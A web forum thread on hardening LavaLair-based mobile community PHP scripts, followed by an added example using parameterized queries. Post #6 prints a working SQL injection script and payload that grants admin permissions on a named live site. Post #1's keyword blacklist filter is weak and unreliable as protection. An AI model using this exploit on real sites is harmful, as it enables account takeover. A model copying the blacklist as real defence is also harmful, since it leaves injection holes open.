How to secure lavalair ALL versions


    How to secure lavalair ALL versions!!!!!!!

    Wapspire v1,v2
    fummobile v1
    aarawap v1

    Yes you hear me right they all are lavalair scripts !!!!!

    First Lets get to know how...

    Place this in your core.php

    PHP Code:
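    function check_injection()
    {
        // SQL keywords treated as suspicious when they appear in request input
        $badchars = array("DROP", "TRUNCATE", "SELECT", "UPDATE", "DELETE", "UNION", "WHERE", "FROM", "INSERT", "ORDER BY");

        foreach ($_REQUEST as $value) {
            if (is_array($value)) {
                continue; // array parameters (name[]=...) are not inspected by this filter
            }
            if (in_array(strtoupper($value), $badchars)) {
                // the whole value is exactly one of the keywords
                $logfile = 'logs/log.txt'; // chmod 777
                $IP = $_SERVER['REMOTE_ADDR'];
                $logdetails = date("F j, Y, g:i a") . ': ' . '<a href=http://dnsstuff.com/tools/city.ch?ip=' . $_SERVER['REMOTE_ADDR'] . ' target=_blank>' . $_SERVER['REMOTE_ADDR'] . '</a>' . "\n";
                $fp = fopen($logfile, "a"); // append; "r+" would overwrite from the start of the file
                fwrite($fp, $logdetails, strlen($logdetails));
                fclose($fp);

                header('Location: http://google.com');
                exit; // stop here, otherwise the page keeps running after the redirect header
            } else {
                // split the value on whitespace and check every word against the list
                // (splitting on "//" yields single characters, which never match a keyword)
                $check = preg_split("/\s+/", $value, -1, PREG_SPLIT_NO_EMPTY);
                foreach ($check as $char) {
                    if (in_array(strtoupper($char), $badchars)) {
                        $logfile = 'logs/log.txt';
                        $IP = $_SERVER['REMOTE_ADDR'];
                        $logdetails = date("F j, Y, g:i a") . ': ' . '<a href=http://dnsstuff.com/tools/city.ch?ip=' . $_SERVER['REMOTE_ADDR'] . ' target=_blank>' . $_SERVER['REMOTE_ADDR'] . '</a>' . "\n";
                        $fp = fopen($logfile, "a");
                        fwrite($fp, $logdetails, strlen($logdetails));
                        fclose($fp);

                        header('Location: http://google.com');
                        exit;
                    }
                }
            }
        }
    }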

    Add this to ALL of your headers, before <html or <doctype, under the core.php include:

    "
    include("core.php");
    check_injection();
    "

    Step 2:

    Do Not Host a UPLOADER

    Step 3:

    Don't let users hotlink images as their avatar; delete this ASAP from your site, or host it with a PHP thumb script. You may search this forum for it !!

    Step 4:

    Do not save logs in logs or any txt files to members/owners info

    Step 5

    Do not use easy passwords like eg: 123456 , abc1234 , password , guest , john , orbit

    Most guest password is your username as your password you must not sign up like

    username: john1942
    password: john1942

    End of page.......

    If you are still getting hacked / SQL / hijacked, this means you didn't go through the steps as I told you...
    Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
    Visit: WapMasterz Coming Back Soon!
    _______
    SCRIPTS FOR SALE BY SUBZERO
    Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
    FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
    _______
    Info & Tips
    php.net
    w3schools.com

    #2
    this is great thanks.......



      #3
      Hope it will work so shell doesn't work!
      com site: http://vampist.net
      download site: http://wapdloads.net
      fb: http://www.facebook.com/pmplx



        #4
        tnx for this man -up-
        Last edited by wapmetal; 09.10.10, 14:50.


          #5
          no wapmetal. Just remove the [img=][/img].
          mysterio.al - programming is a functional art



            #6
            Here is the tool I used to crack into the target site:


            <?php
            class Browser {
            function __construct($ua="") {
            $this->UserAgent = $ua;
            }
            public $curl, $count, $data,$UserAgent;
            function url($url) { $this->curl = curl_init($url); }
            function fields($count) { $this->count = $count; }
            function data($data) { $this->data = strtolower($data); }
            function send() {
            curl_setopt($this->curl, CURLOPT_POST, $this->count);
            if(!empty($this->UserAgent)) {
            curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
            }
            curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
            curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
            $result = curl_exec($this->curl);
            curl_close($this->curl);
            return $result;
            }

            }

            $uid = "masnun";

            $info = "fear the geek, since you must!',perm='4',validated='1'#";
            $m = new Browser("Samsung SGH C160");
            $m->url("http://kalponik.freehostia.com/web/register.php");
            $m->fields(12);
            $m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month =03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

            print_r($m->send());

            ?>

            The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and its insert SQLs are in the format:

            INSERT INTO table_name SET column_1='value_1', column_2 ='value_2'

            So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

            My suggestion would be to use Insert SQLs in this way:

            INSERT INTO table_name (column_1,column_2) VALUES ('value_1','value_2')

            And now a little rant about these so-called hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these script kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… :D
            (copy from blog)

            Free Mobile Web Scripts by me: Free Youtube Downloader, Tweets Reader, Facebook Wall Posts Reader
            PHP Tutorials: How to Secure Your PHP Script (PHP SECURITY)
            Want to Develop/Edit your WAP/Web Site? Add me to Gtalk (gmail) 'lakshan1989' or PM me.
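
Added example, not part of any post in this thread: the keyword filter in post #1 and the INSERT formats in post #6 both deal with request values that end up inside SQL text, and bound parameters keep such a value as data whichever INSERT syntax is used. The `users` table, its columns and `register_user()` are assumptions for illustration, and the code runs against an in-memory SQLite database through PDO.

```php
<?php
// Hypothetical registration handler: only uid, pwd and info are read from the
// request. perm and validated are fixed by the server and never taken from input.
function register_user(PDO $db, array $post): int
{
    $uid  = trim((string)($post['uid'] ?? ''));
    $info = (string)($post['info'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_]{3,20}$/', $uid)) {
        throw new InvalidArgumentException('invalid uid');
    }
    if (strlen($info) > 200) {
        throw new InvalidArgumentException('info too long');
    }
    // Placeholders are sent separately from the statement text, so quotes or
    // comment characters in a value cannot change the statement.
    $stmt = $db->prepare(
        'INSERT INTO users (uid, pwd_hash, info, perm, validated)
         VALUES (:uid, :pwd, :info, 0, 0)'
    );
    $stmt->execute([
        ':uid'  => $uid,
        ':pwd'  => password_hash((string)($post['pwd'] ?? ''), PASSWORD_DEFAULT),
        ':info' => $info,
    ]);
    return (int)$db->lastInsertId();
}

// Constructed schema for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, uid TEXT UNIQUE,
           pwd_hash TEXT, info TEXT, perm INTEGER, validated INTEGER)');

// Constructed request reusing the info value quoted in post #6.
$post = [
    'uid'  => 'masnun',
    'pwd'  => 'masnun',
    'info' => "fear the geek, since you must!',perm='4',validated='1'#",
];
$id  = register_user($db, $post);
$get = $db->prepare('SELECT info, perm, validated FROM users WHERE id = ?');
$get->execute([$id]);
$row = $get->fetch(PDO::FETCH_ASSOC);

// The value is stored verbatim and the privilege columns keep their defaults.
var_dump($row['info'] === $post['info']);
var_dump((int)$row['perm'], (int)$row['validated']);
```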



              #7
              thanks for sharing,, uhhm.. I think I have to try it..



                #8
                shell script Please read Step 2: AGAIN !!


                  #9
                  Step 2 is the best
                  Did I help you?
                  You can help me too
                  Your donations will help me finance my studies.



                    #10
                    Originally posted by Mysterio3 View Post
                    no wapmetal. Just remove the [img=][/img].
                    yes i have done with it ...thanks a lot


                      #11
                      I hope this works
                      http://myfacepals.com
                      MYFACEPALS SOCIAL NETWORKsigpic



                        #12
                        Thanks Sub bro !

                        Everything is done but there is still some confusion about Step 3: what about the hotlink? I am even using the thumb img for avatars, but how can I block it if anybody places any link in their INFO:

                        like click here
                        [url=http://google.co.in]click here[/ url]

                        sorry if stupid ques.
                        Last edited by wapmaster2; 17.12.09, 10:50.
                        JUST JOIN FOR FUN !
                        http://wapmaster2.com



                          #13
                          Originally posted by wapmaster2 View Post
                          Everything is done but there is still some confusion about Step 3: what about the hotlink? I am even using the thumb img for avatars, but how can I block it if anybody places any link in their INFO:

                          like click here
                          [url=http://google.co.in]click here[/ url]

                          sorry if stupid ques.
                          It's a BBCode from your core



                            #14
                            Thanks huwad and yep its unnecessary thing. Blog Club and topic is enough .......... dear how can i add in bbcode to change text color ?

                            means like this [red]your text here[ /red]

                            Thanks !


                              #15
                              Originally posted by wapmaster2 View Post
                              Thanks huwad and yep its unnecessary thing. Blog Club and topic is enough .......... dear how can i add in bbcode to change text color ?

                              means like this [red]your text here[ /red]

                              Thanks !
                              that was posted once or twice before...
                              so you could really use search
                              It's better to keep your mouth shut and give the impression that you're stupid, than to open it and remove all doubt.
                              ⓣⓗⓔ ⓠⓤⓘⓔⓣⓔⓡ ⓨⓞⓤ ⓑⓔ©ⓞⓜⓔ, ⓣⓗⓔ ⓜⓞⓡⓔ ⓨⓞⓤ ⓐⓡⓔ ⓐⓑⓛⓔ ⓣⓞ ⓗⓔⓐⓡ !
                              ιη тнєσяу, тнє ρяα¢тι¢є ιѕ α яєѕυℓт σƒ тнє тнєσяу, вυт ιη ρяα¢тι¢є ιѕ тнє σρρσѕιтє.
                              キノgんイノ刀g 4 ア乇ムc乇 ノ丂 レノズ乇 キucズノ刀g 4 √ノ尺gノ刀ノイリ!
